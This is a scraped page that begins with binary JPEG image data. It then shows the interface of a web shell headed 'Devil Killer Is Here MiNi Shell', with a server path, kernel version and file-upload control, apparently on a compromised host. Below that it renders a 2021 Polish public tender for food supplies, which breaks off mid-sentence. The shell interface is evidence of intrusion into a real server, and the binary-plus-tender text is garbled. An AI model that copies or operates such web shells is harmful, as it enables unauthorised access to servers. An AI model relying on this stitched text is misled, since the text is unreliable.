JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211231/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211231/0034003701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa żywności – artykuły spożywcze </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Kształcenia i Wychowania Ochotniczych Hufców Pracy w Pleszewie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 251012394</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Wojska Polskiego 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pleszew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ckiwpleszew@ohp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ckiw-pleszew-bip.ohp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa żywności – artykuły spożywcze </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-60cf62b4-6a04-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00340037</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wymagania informacyjne zostały szczegółowo określone w załączniku do Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wymagania informacyjne zostały szczegółowo określone w załączniku do Specyfikacji Warunków Zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BSIZP-11-2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa artykułów spożywczych. Zakres rzeczowy w szczególności obejmuje:<br/>LP.	NAZWA TOWARU	J.M.	ILOŚĆ<br/>1	Ananas masa netto 565g	szt.	80<br/>2	Baton Mars 47G	szt.	500<br/>3	Baton Snickers 50G	szt.	500<br/>4	Bazylia 10g Ziołowit	szt.	50<br/>5	Brzoskwinie puszka Sandra 820g	szt.	100<br/>6	Budyń Smietankowy DELEKTA 64 g	szt.	400<br/>7	Chrzan - krakus 180 g	szt.	50<br/>8	Ciastka Delicje Szampańskie 147g	szt.	500<br/>9	Ciastka Jerzyki Goplana 140g	szt.	500<br/>10	Cukier kg	1000<br/>11	Cukier puder 400g	szt.	30<br/>12	Cukier waniliowy Delecta 32g	szt.	100<br/>13	Czekolada mleczna Goplana 100g	szt.	150<br/>14	Czosnek granulowany prymat - kamis250g	szt.	20<br/>15	Czosnek granulowany prymat - kamis Galeo 20g	szt.	200<br/>16	Degusta kucharek 1 kg przyprawa	szt.	10<br/>17	Degusta kucharek 200 g przyprawa	szt.	80<br/>18	Delikat przyprawa do mięs KNOR 200g	szt.	80<br/>19	Drożdże suche DELECTA 7g szt.	30<br/>20	Drożdże Babuni 100g	szt.	50<br/>21	Dżem 280g Sorella	szt.	400<br/>22	Fasola sucha 1 kg	kg	50<br/>23	Kukurydza konserwowa - KOTLIN 0,9l	szt.	80<br/>24	Galaretka Winiary 75g	szt.	400<br/>25	Gorczyca 30g Ziołowit	szt.	20<br/>26	Groch łuskany 1 kg kg	20<br/>27	Groszek konserwowy Kotlin 400g	szt.	250<br/>28	Herbata granulowana 100g	szt.	800<br/>29	Herbata Minutka 100 saszetek	szt.	50<br/>30	Herbata Lipton OWOCOWE 20 saszetek	szt.	80<br/>31	Herbata Lipton 100 saszetek	szt.	80<br/>32	Kakao DecoMorreno 150g	szt.	30<br/>33	Kasza pęczak Sante1 kg	szt.	30<br/>34	Kasza jaglana sante 1 kg	szt.	10<br/>35	Kasza bulgur KUPIEC - 400g	szt.	70<br/>36	Kasza jęczmienna - CENNOS 1kg	kg	60<br/>37	Kawa Jacobs 250 g zielona	szt.	100<br/>38	Kawa Jacobs 500 g zielona	szt.	100<br/>39	Kawa rozpuszczalna Jacobs 200g	szt.	150<br/>40	Ketchup Kotlin 1l	szt.	150<br/>41	Ketchup 3 kg Kotlin	szt.	20<br/>42	Kisiel WINIARY 77g	szt.	400<br/>43	Koncentrat pomidorowy 1l Kotlin	szt.	150<br/>44	Krem czekoladowy 230 g Nutella	szt.	150<br/>45	Kukurydza konserwowa KOTLIN 400G	szt.	150<br/>46	Kwasek cytrynowy Galeo 20g	szt.	150<br/>47	Liść laurowy Galeo 6g	szt.	100<br/>48	Majeranek PRYMAT 8g	szt.	30<br/>49	Majeranek PRYMAT 100g	szt.	50<br/>50	Majonez Winiary 400g	szt.	300<br/>51	Majonez Winiary 0,7l	szt.	100<br/>52	Majonez Winiary 3000 ml szt.	30<br/>53	Makaron do rosołu nitki CZANIEC 250 g 300<br/>54	Makaron ryżowy BARYLLA 500 g	szt.	30<br/>55	Makaron gniazda CZANIEC 0,5 kg	szt.	30<br/>56	Makaron LUBELLA pióra 0,5 kg	szt.	100<br/>57	Makaron LUBELLA świderki 0,5 kg	szt.	180<br/>58	Makaron spagetii LUBELLA 0,5 kg	szt.	200<br/>59	Makaron 250g Ekomak	szt.	300<br/>60	Mąka tortowa Kraszewice kg	kg	600<br/>61	Mąka krupczatka kg	kg	30<br/>62	Mąka ziemniaczana kg	kg	80<br/>63	Musztarda stołowa 1l Pegaz	szt.	50<br/>64	Ocet 0,5 l	szt.	180<br/>65	Ogórek konserwowy 0,9l	szt.	200<br/>66	Olej Kujawski 1 l	szt.	400<br/>67	Olej 5l	szt.	60<br/>68	Papryka konserwowa 0,9 l	szt.	200<br/>69	Papryka ostra PRYMAT 20g	szt.	30<br/>70	Papryka słodka PRYMAT 20g	szt.	150<br/>71	Fasola konserwowa ROLNIK - 425 g szt.	200<br/>72	Pasztet Profi 160g Drop	szt.	200<br/>73	Pieprz mielony kamis lub prymat 20g	szt.	300<br/>74	Pieprz ziarnisty kamis lub prymat 800g	szt.	30<br/>75	Pieprz ziarnisty kamis lub prymat 20g	szt.	170<br/>76	Pieprz mielony PRYMAT - KAMIS 250g	szt.	50<br/>77	Płatki Nesguik 250g	szt.	100<br/>78	Płatki kukurydziane corn flakes NESTLE 250g	szt.	50<br/>79	Płatki Cini Minis NESTLE 500g	szt.	50<br/>80	Płatki owsiane - SANTE 500g	szt.	100<br/>81	Płatki musli - NESLE 350g	szt.	250<br/>82	Płatki cherioos 250g	szt.	250<br/>83	Powidła 280g Unamel	szt.	100<br/>84	Proszek do pieczenia Delecta 30g	szt.	50<br/>85	Przyprawa Gyros 30g	szt.	50<br/>86	Przyprawa stołowa 1 l Winiary	szt.	60<br/>87	Ryż paraboliczny SONKO 4 x 100 g	kg	100<br/>88	Ryż SONKO1 kg	kg	60<br/>89	Ryż kartonik Sonko 4x100g	szt.	200<br/>90	Soczek TYMBARK różne smaki 500 ml - plastykowe butelki	szt.	300<br/>91	Soczek TYMBARK różne smaki 300 ml - plastykowe butelki	szt.	300<br/>92	Seler konserwowa Rolnik	szt.	300<br/>93	Sos do pieczeni Winiary 30g	szt.	30<br/>94	Sól 1 kg Solino	szt.	170<br/>95	Syrop do rozcieńczania Herbapol 430ml	szt.	350<br/>96	Suszone śliwki 200 g Bakolland	szt.	100<br/>97	Płatki migdałów 75 g Bakolland	szt.	100<br/>98	Orzeszki fistaszki 150 g KRESTO	szt.	200<br/>99	Ciasto francuskie w opakowaniu XXL 400G szt.	50<br/>100	Śliwki kalifornijskie Emix 100g	szt.	50<br/>101	Wafelek Grzesiek bez czekolady 36g	szt.	650<br/>102	Wafelek Grzesiek czekolada 36g	szt.	650<br/>103	Woda niegazowana 0,5l Dolina Baryczy	szt.	3000<br/>104	Woda gazowana 0,5l Dolina Baryczy	szt.	500<br/>105	Woda niegazowana 1,5l Dolina Baryczy	szt.	500<br/>106	Woda niegazowana 5l Dolina Baryczy	szt.	100<br/>107	Woda 1,5l Dolina Baryczy gazowana	szt.	200<br/>108	Woda musująca niskosodowa cisowianka 500 ml - szkło	szt.	50<br/>109	Woda musująca niskosodowa cisowianka 700 ml - szkło	szt.	50<br/>110	Zaprawa cytrynowa pasek Łowicz	szt.	200<br/>111	Zioła prowansalskie kamis lub prymat 10g	szt.	100<br/>112	Ziele angielskie Galeo 20g	szt.	100<br/>113	Żelatyna Cykoria 50g	Szt.	100<br/>114	Żelatyna 1 kg Cykoria	kg	20<br/>115	Sól o obniżonej zawartości sodu potasowo - magnezowa 350g, SANTE szt.	50<br/>116	Lubczyk kamis lub prymat 10g	szt.	20<br/>117	Rozmaryn kamis lub prymat 20g	szt.	20<br/>118	Kminek kamis lub prymat 10g	szt.	20<br/>119	Cząber kamis lub prymat10g	szt.	20<br/>120	Estragon kamis lub prymat 10g szt.	20<br/>121	Miód pszczeli wielokwiatowy 1 l Rydełko	szt.	5<br/>122	Jarzynka bez glutaminianu sodu 450G VEGETA	szt.	30<br/>123	Rodzynki w czekoladzie - 100	szt.	50<br/>124	Oliwki drylowane czarne - pudliszki 900 g	szt.	20<br/>125	Oliwki drylowane zielone - pudliszki 900 g	szt.	20<br/>126	Cebulka złocista -ROLNIK 295 g	szt.	30<br/>127	Cebulka perłowa -ROLNIK 295 g	szt.	30<br/>128	Marmolada wieloowocowa 550 g szt.	10<br/>129	Tymianek kamis lub prymat - 100 g	szt.	20<br/>130	Jałowiec owoc w ziarnkach kamis lub prymat 15 g	szt.	20<br/>131	Pieprz kolorowy ziarna kamis lub prymat - 20 g	szt.	20<br/>132	Gałka muszkatołowa kamis lub prymat - 10 g	szt.	20<br/>133	Przyprawa do bigosu kamis lub prymat - 20 g	szt.	30<br/>134	Przyprawa do flaków kamis lub prymat - 20 g	szt.	20<br/>135	Przyprawa do kurczaka kamis lub prymat - 25 g	szt.	150<br/>136	Przyprawa do ziemniaków kamis lub prymat - 25 g	szt.	50<br/>137	Przyprawa do grilla kamis lub prymat - 20 g	szt.	50<br/>138	Przyprawa curry kamis lub prymat - 20 g	szt.	30<br/>139	Cynamon kamis lub prymat - 15 g	szt.	20<br/>140	Goździk kamis lub prymat- 8 g	szt.	20<br/>141	Musztarda sarepska kamis lub prymat- 180 g	szt.	20<br/>142	Muszrda francuska kamis lub prymat - 180 g	szt.	20<br/>143	Przyprawa suszone pomidory z bazylią - 15 g szt.	50<br/>144	Tortilla pszenna 20 cm - 8 szt.	szt.	50<br/>145	Suszone pomidory w oleju 280 g	szt.	30<br/>146	Ocet balsamiczny 250 ml MONINI- KAMIS	szt.	10<br/>147	Ocet winny 250 ml MONINI- KAMIS	szt.	10<br/>148	Herbata owocowa w saszetkach LIPTON - 20 szt.	szt.	30<br/>149	Herbata zielona w saszetkach LIPTON - 20 szt.	szt.	20<br/>150	Kawa Jacobs ziarnista - 1 kg	szt.	20<br/>151	Sok hortex - pomarańcza 2 l	szt.	100<br/>152	Sok hortex - jabłko 2 l	szt.	100<br/>153	Napój helena- pomarańcza 1,75	szt.	100<br/>154	Napój helena - jabłko- brzoskwiniowy 1,75 l	szt.	100<br/>155	Napój helena - jabłko 1,75 l	szt.	100<br/>156	Kawa zbożowa INKA - 150 g	szt.	20<br/>157	Mak KRESTO- 500 g	szt.	20<br/>158	Wafelki Princessa - 44 g	szt.	500<br/>159	Rodzynki Bakolland- 250 g	szt.	30<br/>160	Orange Hellena gazowana 1,25L	szt.	30<br/>161	Sos bolognese KNORR - 44 g	szt.	50<br/>162	Soda oczyszczona 80 g GELLWE	szt.	20<br/>163	Herbatniki KRAKUSKI - 220 g	szt.	30<br/>164	Cukierki mieszanka wedlowska - 2,5 kg.	szt.	10<br/>165	Cukierki trufle WAWEL - 2,5 kg	szt.	10<br/>166	Galaretka w czekoladzie Wedel - 2,5 kg	szt.	10<br/>167	Cukierki Roshnm milky splash toffi z nadzieniem mlecznym - 1 kg	szt.	30<br/>168	Cukierki krówki Wedel - 2,4	szt.	30<br/>169	Masa Krówkowa kajmak - gostyń - 510 g	szt.	20<br/>170	Soczek Kubuś - 850 ml.	szt.	100<br/>171	Soczek Kubuś - 300 ml.	szt.	15<br/>172	Batony Kit - kat 40 g	szt.	700<br/>173	Batony Kit - kat 100 g	szt.	700<br/>174	Ciastka krakersiki mix solone ARTUR - 90 g	szt.	200<br/>175	Paluszki Lajkonik- 200 g	szt.	200<br/>176	KRAKUSKI DESEROWE Z CUKREM 171G	szt.	300<br/>177	CIASTKA MILKA PIEGUSKI CHOCO COOKIES 135G	szt.	300<br/>178	BATON KINDER BUENO 43G szt.	200<br/>179	PŁATKI GRANOLA 350G Z SANTE szt.	100<br/>180	CZEKOLADA GORZKA GOPLANA - 90g szt.	100<br/>181	POMIDORY W PUSZCE KROJONE W CAŁOŚCI szt.	50<br/>182	KISIEL GORĄCY KUBEK GELLWE RÓŻNE SMAKI szt.	500<br/>183	MAKARON MUSZELKI LUBELLA 500G	szt.	50<br/>184	KASZA KUS KUS- SONKO - 4 x 100 g	szt.	50<br/>185	MAKARON CIEMNY Z LUBELLI 500 G	szt.	50<br/>186	SŁONECZNIK ŁUSKANY BAKALLAND - 500 g	szt.	20<br/>187	SŁONECZNIK ŁUSKANY BAKALLAND - 100 g	szt.	50<br/>188	PESTKI DYNI BAKALLAND - 200g	szt.	20<br/>189	CZEKOLADA Nussbeissr ORZECHAMI LASKOWYMI - 100g	szt.	100<br/>190	CIASTKA PRECLE Z MASŁEM - TAGO 135G szt.	100<br/>191	PALUSZKI Z GALARETKĄ W CZEKOLADZIE KRAKUS -144G	szt.	150<br/>192	ALPEJSKIE MLECZKO O SMAKU WANILIOWYM - MILKA 330G	szt.	100<br/>193	MILKA OREO BATON 37G szt.	100<br/>194	MILKA CZEKOLADA RASPBERRY CREME 100G	szt.	100<br/>195	MILKA CZEKOLADA ALPINE MILK 100G	szt.	100<br/>196	RURKI WAFLOWE Z KREMEM O SMAKU WANILIOWYM 280G CUKIERNIA RÓŻA szt.	100<br/>197 Baton BROWNIE MILKA 6x25G	szt.	100<br/>198	MERCI 250G szt.	20<br/>199	MERCI 400G szt.	20<br/>200	CUKIERKISCHOKO BONS- MILKI 125 g	szt.	100<br/>201	ŻURAWINA - BAKALAND 100G szt.	30<br/>202	WAFLE FAMILIJNE ŚMIETANKOWE Z JUTRZENKI 180G szt.	150<br/>203	WAFLE FAMILIJNE GOFROWE RÓŻNE SMAKI 140G	szt.	150<br/>204	HERBATNIKI MALTANKI Z KRAKUSA 80G	szt.	200<br/>205	BATON 3 BIT 46G szt.	200<br/>206	7 DAYS ROGAL - 60g	szt.	100<br/>207	KRAKUSKI MAŚLANE 201G	szt.	100<br/>208	KRAKUSKI FLORIANKI ,SERDUSZKA,171G	szt.	100<br/>209	Baton Kinder Country - 23,5 g	szt.	100<br/>210	Sos sałatkowy grecki Knorr - 700 g	szt.	10<br/>211	Sos sałatkowy włoski Knorr - 700 g	szt.	5<br/>212	Aroma mix maślano - ziołowy do ryb z KNORRA 1100 g	szt.	5<br/>213	Sos cytrynowo - maślany Knorr - 800 g	szt.	2<br/>214	Sos pieczeniowy 1,4 kg KNORR	szt.	3<br/>215	Makaron świderki zielony - 500 g	szt.	30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">szczegółowo opisany w Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany, uzupełnienia towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Informacja o podwykonawcach <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się zmian modyfikujących ogólny charakter umowy oraz wprowadzania do umowy zmian istotnych, za które uważa się zmiany określone w art. 454 ust 2 ustawy Prawo zamówień 